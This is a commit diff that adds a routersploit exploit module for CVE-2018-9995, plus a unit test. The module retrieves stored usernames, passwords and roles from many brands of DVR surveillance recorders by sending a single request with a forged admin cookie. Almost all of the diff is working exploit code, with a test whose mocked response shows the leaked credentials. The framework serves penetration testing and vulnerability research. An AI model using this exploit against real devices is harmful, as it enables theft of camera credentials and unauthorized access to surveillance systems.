Adding exploit for CVE-2018-9995 - DVR Creds Disclosure (#393)

routersploit/modules/exploits/cameras/multi/dvr_creds_disclosure.py

+import json
+from routersploit.core.exploit import *
+from routersploit.core.http.http_client import HTTPClient
+
+
+class Exploit(HTTPClient):
+    __info__ = {
+        "name": "DVR Creds Disclosure",
+        "description": "Module exploits authentication bypass vulnerability in multiple DVR devices allowing "
+                       "attacker to retrieve users credentials.",
+        "authors": (
+            "ezelf <ezelf86[at]protonmail.com>",  # vulnerability discovery
+            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
+        ),
+        "references": (
+            "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9995",
+            "https://github.com/ezelf/CVE-2018-9995_dvr_credentials",
+        ),
+        "devices": (
+            "TBK DVR4104",
+            "DVR4216",
+            "Novo",
+            "CeNova",
+            "QSee",
+            "Pulnix",
+            "XVR 5 in 1",
+            "Securus",
+            "Night OWL",
+            "DVR Login",
+            "HVR Login",
+            "MDVR Login",
+        ),
+    }
+
+    target = OptIP("", "Target IPv4 or IPv6 address")
+    port = OptPort(80, "Target HTTP port")
+
+    def __init__(self):
+        self.credentials = []
+
+    def run(self):
+        self.credentials = []
+
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            print_table(("Username", "Password", "Role"), *self.credentials)
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+
+    @mute
+    def check(self):
+        cookies = {
+            "uid": "admin",
+        }
+        response = self.http_request(
+            method="GET",
+            path="/device.rsp?opt=user&cmd=list",
+            cookies=cookies,
+        )
+
+        if response:
+            try:
+                json_data = json.loads(response.text)
+                for data in json_data["list"]:
+                    self.credentials.append((data["uid"], data["pwd"], data["role"]))
+                return True  # target is vulnerable
+            except Exception:
+                pass
+
+        return False  # target is not vulnerable

tests/exploits/cameras/multi/test_dvr_creds_disclosure.py

+from routersploit.modules.exploits.cameras.multi.dvr_creds_disclosure import Exploit
+
+
+def test_check_success(target):
+    """ Test scenario - successful exploitation """
+
+    route_mock = target.get_route_mock("/device.rsp", methods=["GET"])
+    route_mock.return_value = ("""{"result":0,"list":[{"uid":"admin","pwd":"admin","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295},{"uid":"test","pwd":"test","role":3,"enmac":0,"mac":"00:11:22:33:44:55","playback":65535,"view":0,"rview":65535,"ptz":0,"backup":65535,"opt":62437}]}""")
+
+    exploit = Exploit()
+    exploit.target = target.host
+    exploit.port = target.port
+
+    assert exploit.check()
+    assert exploit.run() is None
+